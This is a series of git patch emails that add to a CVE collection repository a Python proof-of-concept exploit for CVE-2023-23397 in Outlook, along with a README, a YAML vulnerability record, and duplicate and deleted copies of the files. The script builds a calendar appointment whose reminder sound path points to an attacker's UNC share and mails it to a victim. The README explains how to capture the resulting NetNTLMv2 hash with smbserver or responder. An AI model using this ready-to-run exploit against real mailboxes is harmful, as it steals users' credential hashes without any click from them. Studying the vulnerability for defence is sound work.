From dd8092788d241ed801dcaf4b6d09d81332d736bc Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 14:45:35 +0000 Subject: [PATCH 01/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20Outlook?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/.keep diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From dfa7563c15fa592ec10814e0a35eac2e31123d7d Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 14:45:45 +0000 Subject: [PATCH 02/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/.keep diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 862fcd27b0602f0e137e6739deb737abe3357424 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:03:23 +0000 Subject: [PATCH 03/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20Outlook?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/.keep diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From f13be9baf18cbb05daf44064834c5a367190946c Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:08:10 +0000 Subject: [PATCH 04/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/.keep diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From dbad32b4b44e13cbdbbc1e720cb573c352f26b97 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:09:17 +0000 Subject: [PATCH 05/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20Outlook?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/.keep diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From ac03f0f3c3f34076fbdfe8d3936b49e6f30dd506 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:10:01 +0000 Subject: [PATCH 06/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2023-23397?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/CVE-2023-23397/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/CVE-2023-23397/.keep diff --git a/cve/Outlook/CVE-2023-23397/.keep b/cve/Outlook/CVE-2023-23397/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From cef6f58176dbde78b9f7bb824f499d4d84d7668a Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:10:49 +0000 Subject: [PATCH 07/24] =?UTF-8?q?=E4=B8=BB=E8=A6=81=E9=92=88=E5=AF=B9Outlo?= =?UTF-8?q?ok=E5=AE=A2=E6=88=B7=E7=AB=AF=E5=AF=B9=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E8=BE=93=E5=85=A5=E6=8E=A7=E5=88=B6=E7=9A=84=E5=AE=89=E5=85=A8?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E9=97=AE=E9=A2=98=EF=BC=8C=E8=BF=9B=E8=A1=8C?= =?UTF-8?q?=E4=BF=AE=E5=A4=8D=EF=BC=8C=E4=B8=BB=E8=A6=81=E9=80=9A=E8=BF=87?= =?UTF-8?q?=E8=87=AA=E5=AE=9A=E4=B9=89SMTP=E6=9C=8D=E5=8A=A1=E5=99=A8?= =?UTF-8?q?=E7=94=B5=E5=AD=90=E9=82=AE=E4=BB=B6=E5=8F=91=E9=80=81=E8=AF=B7?= =?UTF-8?q?=E6=B1=82=E6=9D=A5=E8=A7=A3=E5=86=B3=E6=AD=A4=E7=B1=BB=E9=97=AE?= =?UTF-8?q?=E9=A2=98=E3=80=82=20Outlook=20=E7=BC=BA=E4=B9=8F=E5=AF=B9?= =?UTF-8?q?=E5=85=81=E8=AE=B8=E9=85=8D=E7=BD=AE=E4=BC=9A=E8=AE=AE=E5=92=8C?= =?UTF-8?q?=E7=BA=A6=E4=BC=9A=E6=8F=90=E9=86=92=E5=A3=B0=E9=9F=B3=E7=9A=84?= =?UTF-8?q?=E7=94=A8=E6=88=B7=E8=BE=93=E5=85=A5=E7=9A=84=E6=8E=A7=E5=88=B6?= =?UTF-8?q?=E3=80=82=E4=BA=8B=E5=AE=9E=E4=B8=8A=EF=BC=8C=E6=94=BB=E5=87=BB?= =?UTF-8?q?=E8=80=85=E8=83=BD=E5=A4=9F=E5=BC=BA=E8=BF=AB=E5=8F=97=E5=AE=B3?= =?UTF-8?q?=E8=80=85=E8=BF=9E=E6=8E=A5=E5=88=B0=E5=85=B6=E6=9C=8D=E5=8A=A1?= =?UTF-8?q?=E5=99=A8=EF=BC=8C=E8=80=8C=E6=97=A0=E9=9C=80=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E8=BF=9B=E8=A1=8C=E4=BB=BB=E4=BD=95=E6=93=8D=E7=BA=B5=EF=BC=88?= =?UTF-8?q?=E9=9B=B6=E7=82=B9=E5=87=BB=E6=BC=8F=E6=B4=9E=EF=BC=89=E3=80=82?= =?UTF-8?q?=20=E5=88=A9=E7=94=A8=E6=AD=A4=E6=BC=8F=E6=B4=9E=E7=9A=84?= =?UTF-8?q?=E6=94=BB=E5=87=BB=E8=80=85=E9=80=9A=E8=BF=87=20SMB=20=E8=AF=B7?= =?UTF-8?q?=E6=B1=82=E6=A0=B9=E6=8D=AE=E8=A2=AB=E5=9B=B0=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E7=9A=84=E5=AF=86=E7=A0=81=E6=A3=80=E7=B4=A2=20NetNTLMv2=20?= =?UTF-8?q?=E6=91=98=E8=A6=81=EF=BC=8C=E9=82=AE=E4=BB=B6=E5=88=B0=E8=BE=BE?= =?UTF-8?q?=E6=94=B6=E4=BB=B6=E7=AE=B1=E5=90=8E=EF=BC=8C=E5=B0=86=E7=AB=8B?= =?UTF-8?q?=E5=8D=B3=E8=A7=A6=E5=8F=91=E8=AF=B7=E6=B1=82=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: Victoria --- cve/Outlook/CVE-2023-23397/CVE-2023-23397.py | 70 ++++++++++++++++++++ cve/Outlook/CVE-2023-23397/README.md | 41 ++++++++++++ 2 files changed, 111 insertions(+) create mode 100644 cve/Outlook/CVE-2023-23397/CVE-2023-23397.py create mode 100644 cve/Outlook/CVE-2023-23397/README.md diff --git a/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py b/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py new file mode 100644 index 00000000..e40c7318 --- /dev/null +++ b/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py @@ -0,0 +1,70 @@ +import smtplib, datetime, argparse +from email.mime.multipart import MIMEMultipart +from email.mime.text import MIMEText +from email.mime.application import MIMEApplication +from email.utils import COMMASPACE, formatdate +from independentsoft.msg import Message + +# Mail configuration : change it ! +smtp_server = "mail.example.com" +smtp_port = 587 + +sender_email = "attacker@mail.example.com" +sender_password = "P@ssw0rd" + +recipients_email = ["victim@mail.example.com"] + +class Email: + def __init__(self, smtp_server, port, username, password, recipient): + self.smtp_server = smtp_server + self.port = port + self.username = username + self.password = password + self.recipient = recipient + + def send(self, subject, body, attachment_path): + msg = MIMEMultipart() + msg['From'] = self.username + msg['To'] = COMMASPACE.join(self.recipient) + msg['Date'] = formatdate(localtime=True) + msg['Subject'] = subject + + msg.attach(MIMEText(body)) + + with open(attachment_path, 'rb') as f: + part = MIMEApplication(f.read(), Name=attachment_path) + part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' + msg.attach(part) + + try: + server = smtplib.SMTP(self.smtp_server, self.port) + server.starttls() + server.login(self.username, self.password) + server.sendmail(self.username, self.recipient, msg.as_string()) + server.quit() + print("[+] Malicious appointment sent !") + + + except Exception as e: + print("[-] Error with SMTP server...", e) + +parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.') +parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True) +args = parser.parse_args() + +appointment = Message() +appointment.message_class = "IPM.Appointment" +appointment.subject = "CVE-2023-23397" +appointment.body = "New meeting now !" +appointment.location = "Paris" +appointment.appointment_start_time = datetime.datetime.now() +appointment.appointment_end_time = datetime.datetime.now() +appointment.reminder_override_default = True +appointment.reminder_sound_file = args.path +appointment.save("appointment.msg") + +email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email) + +subject = "Hello There !" +body = "Important appointment !" +email.send(subject, body, "appointment.msg") diff --git a/cve/Outlook/CVE-2023-23397/README.md b/cve/Outlook/CVE-2023-23397/README.md new file mode 100644 index 00000000..094e829d --- /dev/null +++ b/cve/Outlook/CVE-2023-23397/README.md @@ -0,0 +1,41 @@ +# CVE-2023-23397 + +Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client. + +## Description + +Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + +An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox. + +## What does the poc do? + +1. Generated `.msg` payload. +2. Send it by email with custom SMTP server. + +## Usage + +In one session : + +```python +python CVE-2023-23397.py + +usage: CVE-2023-23397.py [-h] -p PATH +CVE-2023-23397.py: error: the following arguments are required: -p/--path + +python CVE-2023-23397.py --path '\\yourip\' +``` + +In a second session (`smbserver` or `responder` as you want). + +``` +smbserver.py -smb2support SHARE . +``` + +## Demo (manual poc) + +![poc](poc.gif) + +## Original article + +https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ \ No newline at end of file -- Gitee From 2369dcb312ace1d859c5f1120c5d386dae0f9963 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:10:57 +0000 Subject: [PATCH 08/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/CVE-2023-23397/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/CVE-2023-23397/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/CVE-2023-23397/.keep diff --git a/cve/Outlook/CVE-2023-23397/.keep b/cve/Outlook/CVE-2023-23397/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From be9a6db30283b34230ec837ccb60b756b0ef017b Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:11:05 +0000 Subject: [PATCH 09/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/.keep diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 411011aff0fbad92b0b40e901dcda4a20efcdfc7 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:11:13 +0000 Subject: [PATCH 10/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/yaml/.keep diff --git a/cve/Outlook/yaml/.keep b/cve/Outlook/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From d65fac840744f4fb315166dd8d93bb0803a6685c Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:11:56 +0000 Subject: [PATCH 11/24] add cve/Outlook/yaml/CVE-2023-23397.yaml. Signed-off-by: Victoria --- cve/Outlook/yaml/CVE-2023-23397.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/Outlook/yaml/CVE-2023-23397.yaml diff --git a/cve/Outlook/yaml/CVE-2023-23397.yaml b/cve/Outlook/yaml/CVE-2023-23397.yaml new file mode 100644 index 00000000..f5183573 --- /dev/null +++ b/cve/Outlook/yaml/CVE-2023-23397.yaml @@ -0,0 +1,19 @@ +id: CVE-2023-23397 +source: https://github.com/Trackflaw/CVE-2023-23397 +info: + name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。 + severity: critical + description: | + Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + scope-of-influence: + outlook-2013, outlook-2016, outlook-2019,microsoft:office:2021,microsoft:office:2019 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-23397 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-23397 + cwe-id: CWE-294 + cnvd-id: None + kve-id: None + tags: Microsoft, Outlook, cve2023, 权限提升漏洞 \ No newline at end of file -- Gitee From 13cb9a9e915293baf9f593ae549789fde7ec77e7 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:12:05 +0000 Subject: [PATCH 12/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/yaml/.keep diff --git a/cve/Outlook/yaml/.keep b/cve/Outlook/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 7e179918dcaebd56da6bacce074c6abf489de427 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:12:26 +0000 Subject: [PATCH 13/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202023?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/2023/.keep diff --git a/cve/Outlook/2023/.keep b/cve/Outlook/2023/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 554d943b966e572aa044cbe6a865cf10334c3c79 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:13:03 +0000 Subject: [PATCH 14/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2023-23397?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/CVE-2023-23397/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/2023/CVE-2023-23397/.keep diff --git a/cve/Outlook/2023/CVE-2023-23397/.keep b/cve/Outlook/2023/CVE-2023-23397/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 707fa6b4e8480756dc1b3bd3e1c87154702b5878 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:14:08 +0000 Subject: [PATCH 15/24] =?UTF-8?q?=E4=B8=BB=E8=A6=81=E9=92=88=E5=AF=B9Outlo?= =?UTF-8?q?ok=E5=AE=A2=E6=88=B7=E7=AB=AF=E5=AF=B9=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E8=BE=93=E5=85=A5=E6=8E=A7=E5=88=B6=E7=9A=84=E5=AE=89=E5=85=A8?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E9=97=AE=E9=A2=98=EF=BC=8C=E8=BF=9B=E8=A1=8C?= =?UTF-8?q?=E4=BF=AE=E5=A4=8D=EF=BC=8C=E4=B8=BB=E8=A6=81=E9=80=9A=E8=BF=87?= =?UTF-8?q?=E8=87=AA=E5=AE=9A=E4=B9=89SMTP=E6=9C=8D=E5=8A=A1=E5=99=A8?= =?UTF-8?q?=E7=94=B5=E5=AD=90=E9=82=AE=E4=BB=B6=E5=8F=91=E9=80=81=E8=AF=B7?= =?UTF-8?q?=E6=B1=82=E6=9D=A5=E8=A7=A3=E5=86=B3=E6=AD=A4=E7=B1=BB=E9=97=AE?= =?UTF-8?q?=E9=A2=98=E3=80=82=20Outlook=20=E7=BC=BA=E4=B9=8F=E5=AF=B9?= =?UTF-8?q?=E5=85=81=E8=AE=B8=E9=85=8D=E7=BD=AE=E4=BC=9A=E8=AE=AE=E5=92=8C?= =?UTF-8?q?=E7=BA=A6=E4=BC=9A=E6=8F=90=E9=86=92=E5=A3=B0=E9=9F=B3=E7=9A=84?= =?UTF-8?q?=E7=94=A8=E6=88=B7=E8=BE=93=E5=85=A5=E7=9A=84=E6=8E=A7=E5=88=B6?= =?UTF-8?q?=E3=80=82=E4=BA=8B=E5=AE=9E=E4=B8=8A=EF=BC=8C=E6=94=BB=E5=87=BB?= =?UTF-8?q?=E8=80=85=E8=83=BD=E5=A4=9F=E5=BC=BA=E8=BF=AB=E5=8F=97=E5=AE=B3?= =?UTF-8?q?=E8=80=85=E8=BF=9E=E6=8E=A5=E5=88=B0=E5=85=B6=E6=9C=8D=E5=8A=A1?= =?UTF-8?q?=E5=99=A8=EF=BC=8C=E8=80=8C=E6=97=A0=E9=9C=80=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E8=BF=9B=E8=A1=8C=E4=BB=BB=E4=BD=95=E6=93=8D=E7=BA=B5=EF=BC=88?= =?UTF-8?q?=E9=9B=B6=E7=82=B9=E5=87=BB=E6=BC=8F=E6=B4=9E=EF=BC=89=E3=80=82?= =?UTF-8?q?=20=E5=88=A9=E7=94=A8=E6=AD=A4=E6=BC=8F=E6=B4=9E=E7=9A=84?= =?UTF-8?q?=E6=94=BB=E5=87=BB=E8=80=85=E9=80=9A=E8=BF=87=20SMB=20=E8=AF=B7?= =?UTF-8?q?=E6=B1=82=E6=A0=B9=E6=8D=AE=E8=A2=AB=E5=9B=B0=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E7=9A=84=E5=AF=86=E7=A0=81=E6=A3=80=E7=B4=A2=20NetNTLMv2=20?= =?UTF-8?q?=E6=91=98=E8=A6=81=EF=BC=8C=E9=82=AE=E4=BB=B6=E5=88=B0=E8=BE=BE?= =?UTF-8?q?=E6=94=B6=E4=BB=B6=E7=AE=B1=E5=90=8E=EF=BC=8C=E5=B0=86=E7=AB=8B?= =?UTF-8?q?=E5=8D=B3=E8=A7=A6=E5=8F=91=E8=AF=B7=E6=B1=82=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: Victoria --- .../2023/CVE-2023-23397/CVE-2023-23397.py | 70 +++++++++++++++++++ cve/Outlook/2023/CVE-2023-23397/README.md | 41 +++++++++++ 2 files changed, 111 insertions(+) create mode 100644 cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py create mode 100644 cve/Outlook/2023/CVE-2023-23397/README.md diff --git a/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py b/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py new file mode 100644 index 00000000..e40c7318 --- /dev/null +++ b/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py @@ -0,0 +1,70 @@ +import smtplib, datetime, argparse +from email.mime.multipart import MIMEMultipart +from email.mime.text import MIMEText +from email.mime.application import MIMEApplication +from email.utils import COMMASPACE, formatdate +from independentsoft.msg import Message + +# Mail configuration : change it ! +smtp_server = "mail.example.com" +smtp_port = 587 + +sender_email = "attacker@mail.example.com" +sender_password = "P@ssw0rd" + +recipients_email = ["victim@mail.example.com"] + +class Email: + def __init__(self, smtp_server, port, username, password, recipient): + self.smtp_server = smtp_server + self.port = port + self.username = username + self.password = password + self.recipient = recipient + + def send(self, subject, body, attachment_path): + msg = MIMEMultipart() + msg['From'] = self.username + msg['To'] = COMMASPACE.join(self.recipient) + msg['Date'] = formatdate(localtime=True) + msg['Subject'] = subject + + msg.attach(MIMEText(body)) + + with open(attachment_path, 'rb') as f: + part = MIMEApplication(f.read(), Name=attachment_path) + part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' + msg.attach(part) + + try: + server = smtplib.SMTP(self.smtp_server, self.port) + server.starttls() + server.login(self.username, self.password) + server.sendmail(self.username, self.recipient, msg.as_string()) + server.quit() + print("[+] Malicious appointment sent !") + + + except Exception as e: + print("[-] Error with SMTP server...", e) + +parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.') +parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True) +args = parser.parse_args() + +appointment = Message() +appointment.message_class = "IPM.Appointment" +appointment.subject = "CVE-2023-23397" +appointment.body = "New meeting now !" +appointment.location = "Paris" +appointment.appointment_start_time = datetime.datetime.now() +appointment.appointment_end_time = datetime.datetime.now() +appointment.reminder_override_default = True +appointment.reminder_sound_file = args.path +appointment.save("appointment.msg") + +email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email) + +subject = "Hello There !" +body = "Important appointment !" +email.send(subject, body, "appointment.msg") diff --git a/cve/Outlook/2023/CVE-2023-23397/README.md b/cve/Outlook/2023/CVE-2023-23397/README.md new file mode 100644 index 00000000..094e829d --- /dev/null +++ b/cve/Outlook/2023/CVE-2023-23397/README.md @@ -0,0 +1,41 @@ +# CVE-2023-23397 + +Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client. + +## Description + +Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + +An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox. + +## What does the poc do? + +1. Generated `.msg` payload. +2. Send it by email with custom SMTP server. + +## Usage + +In one session : + +```python +python CVE-2023-23397.py + +usage: CVE-2023-23397.py [-h] -p PATH +CVE-2023-23397.py: error: the following arguments are required: -p/--path + +python CVE-2023-23397.py --path '\\yourip\' +``` + +In a second session (`smbserver` or `responder` as you want). + +``` +smbserver.py -smb2support SHARE . +``` + +## Demo (manual poc) + +![poc](poc.gif) + +## Original article + +https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ \ No newline at end of file -- Gitee From 118df22c2d205d03bd0cd3f505434fa3299f5793 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:14:17 +0000 Subject: [PATCH 16/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/2023/CVE-2023-23397/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/CVE-2023-23397/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/2023/CVE-2023-23397/.keep diff --git a/cve/Outlook/2023/CVE-2023-23397/.keep b/cve/Outlook/2023/CVE-2023-23397/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From e335e6d071c5b66abf54dfa3b8823e89f68ece19 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:14:29 +0000 Subject: [PATCH 17/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/2023/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/2023/.keep diff --git a/cve/Outlook/2023/.keep b/cve/Outlook/2023/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From e961cc5f00e859251c77eeda15dec8f42a81f18c Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:14:36 +0000 Subject: [PATCH 18/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/2023/yaml/.keep diff --git a/cve/Outlook/2023/yaml/.keep b/cve/Outlook/2023/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 31d4921bd1900faaa3a7a78e665dd392641d05cf Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:15:38 +0000 Subject: [PATCH 19/24] add cve/Outlook/2023/yaml/CVE-2023-23397.yaml. Signed-off-by: Victoria --- cve/Outlook/2023/yaml/CVE-2023-23397.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/Outlook/2023/yaml/CVE-2023-23397.yaml diff --git a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml new file mode 100644 index 00000000..f5183573 --- /dev/null +++ b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml @@ -0,0 +1,19 @@ +id: CVE-2023-23397 +source: https://github.com/Trackflaw/CVE-2023-23397 +info: + name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。 + severity: critical + description: | + Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + scope-of-influence: + outlook-2013, outlook-2016, outlook-2019,microsoft:office:2021,microsoft:office:2019 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-23397 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-23397 + cwe-id: CWE-294 + cnvd-id: None + kve-id: None + tags: Microsoft, Outlook, cve2023, 权限提升漏洞 \ No newline at end of file -- Gitee From 8869f9f3df4ef566ea0436c876589a8a7847a7bd Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:16:04 +0000 Subject: [PATCH 20/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/CVE-2023-23397?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/CVE-2023-23397/CVE-2023-23397.py | 70 -------------------- cve/Outlook/CVE-2023-23397/README.md | 41 ------------ 2 files changed, 111 deletions(-) delete mode 100644 cve/Outlook/CVE-2023-23397/CVE-2023-23397.py delete mode 100644 cve/Outlook/CVE-2023-23397/README.md diff --git a/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py b/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py deleted file mode 100644 index e40c7318..00000000 --- a/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py +++ /dev/null @@ -1,70 +0,0 @@ -import smtplib, datetime, argparse -from email.mime.multipart import MIMEMultipart -from email.mime.text import MIMEText -from email.mime.application import MIMEApplication -from email.utils import COMMASPACE, formatdate -from independentsoft.msg import Message - -# Mail configuration : change it ! -smtp_server = "mail.example.com" -smtp_port = 587 - -sender_email = "attacker@mail.example.com" -sender_password = "P@ssw0rd" - -recipients_email = ["victim@mail.example.com"] - -class Email: - def __init__(self, smtp_server, port, username, password, recipient): - self.smtp_server = smtp_server - self.port = port - self.username = username - self.password = password - self.recipient = recipient - - def send(self, subject, body, attachment_path): - msg = MIMEMultipart() 